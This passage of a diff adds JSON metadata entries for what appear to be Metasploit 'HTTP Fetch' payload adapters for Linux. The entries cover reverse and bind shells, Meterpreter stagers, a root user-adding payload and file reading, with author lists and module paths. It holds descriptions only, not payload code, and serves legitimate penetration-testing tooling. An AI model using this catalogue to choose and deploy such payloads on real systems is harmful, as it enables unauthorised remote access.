"post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/shell_find_port", + "staged": false + }, + "payload_cmd/linux/http/x64/shell_reverse_ipv6_tcp": { + "name": "HTTP Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/http/x64/shell_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "epi " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell over IPv6", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/shell_reverse_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/http/x64/shell_reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/x86/adduser": { + "name": "HTTP Fetch, Linux Add User", + "fullname": "payload/cmd/linux/http/x86/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "vlad902 ", + "spoonm " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nCreate a new user with UID 0", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/adduser", + "staged": false + }, + "payload_cmd/linux/http/x86/chmod": { + "name": "HTTP Fetch, Linux Chmod", + "fullname": "payload/cmd/linux/http/x86/chmod", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "kris katterjohn " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nRuns chmod on specified file with specified mode", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/chmod", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/chmod", + "staged": false + }, + "payload_cmd/linux/http/x86/exec": { + "name": "HTTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/http/x86/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "vlad902 ", + "Geyslan G. Bem " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nExecute an arbitrary command or just a /bin/sh shell", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm", + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/exec", + "staged": false + }, + "payload_cmd/linux/http/x86/generic/debug_trap": { + "name": "HTTP Fetch, Generic x86 Debug Trap", + "fullname": "payload/cmd/linux/http/x86/generic/debug_trap", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "robert " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nGenerate a debug trap in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/generic/debug_trap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "generic/debug_trap", + "staged": false + }, + "payload_cmd/linux/http/x86/generic/tight_loop": { + "name": "HTTP Fetch, Generic x86 Tight Loop", + "fullname": "payload/cmd/linux/http/x86/generic/tight_loop", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "jduck " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nGenerate a tight loop in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/generic/tight_loop", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "generic/tight_loop", + "staged": false + }, + "payload_cmd/linux/http/x86/meterpreter/bind_ipv6_tcp": { + "name": "HTTP Fetch, Bind IPv6 TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn ", + "egypt " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for an IPv6 connection (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_ipv6_tcp" + }, + "payload_cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid": { + "name": "HTTP Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" + }, + "payload_cmd/linux/http/x86/meterpreter/bind_nonx_tcp": { + "name": "HTTP Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/bind_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_nonx_tcp" + }, + "payload_cmd/linux/http/x86/meterpreter/bind_tcp": { + "name": "HTTP Fetch, Bind TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_tcp" + }, + "payload_cmd/linux/http/x86/meterpreter/bind_tcp_uuid": { + "name": "HTTP Fetch, Bind TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_tcp_uuid" + }, + "payload_cmd/linux/http/x86/meterpreter/find_tag": { + "name": "HTTP Fetch, Find Tag Stager", + "fullname": "payload/cmd/linux/http/x86/meterpreter/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nUse an established connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/find_tag", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/find_tag" + }, + "payload_cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp": { + "name": "HTTP Fetch, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to attacker over IPv6", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_ipv6_tcp" + }, + "payload_cmd/linux/http/x86/meterpreter/reverse_nonx_tcp": { + "name": "HTTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/x86/meterpreter/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_nonx_tcp" + }, + "payload_cmd/linux/http/x86/meterpreter/reverse_tcp": { + "name": "HTTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/x86/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "tkmru" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_tcp" + }, + "payload_cmd/linux/http/x86/meterpreter/reverse_tcp_uuid": { + "name": "HTTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/x86/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_tcp_uuid" + }, + "payload_cmd/linux/http/x86/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/x86/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/x86/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/x86/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/x86/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/x86/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/x86/metsvc_bind_tcp": { + "name": "HTTP Fetch, Linux Meterpreter Service, Bind TCP", + "fullname": "payload/cmd/linux/http/x86/metsvc_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hdm " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nStub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/metsvc_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/metsvc_bind_tcp", + "staged": false + }, + "payload_cmd/linux/http/x86/metsvc_reverse_tcp": { + "name": "HTTP Fetch, Linux Meterpreter Service, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/x86/metsvc_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hdm " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nStub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/metsvc_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/metsvc_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/x86/read_file": { + "name": "HTTP Fetch, Linux Read File", + "fullname": "payload/cmd/linux/http/x86/read_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hal" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nRead up to 4096 bytes from the local file system and write it back out to the specified file descriptor", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/read_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/read_file", + "staged": false + }, + "payload_cmd/linux/http/x86/shell/bind_ipv6_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/http/x86/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn ", + "egypt " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_ipv6_tcp" + }, + "payload_cmd/linux/http/x86/shell/bind_ipv6_tcp_uuid": { + "name": "HTTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/http/x86/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" + }, + "payload_cmd/linux/http/x86/shell/bind_nonx_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/http/x86/shell/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/bind_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_nonx_tcp" + }, + "payload_cmd/linux/http/x86/shell/bind_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/http/x86/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for a connection (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_tcp" + }, + "payload_cmd/linux/http/x86/shell/bind_tcp_uuid": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/http/x86/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + 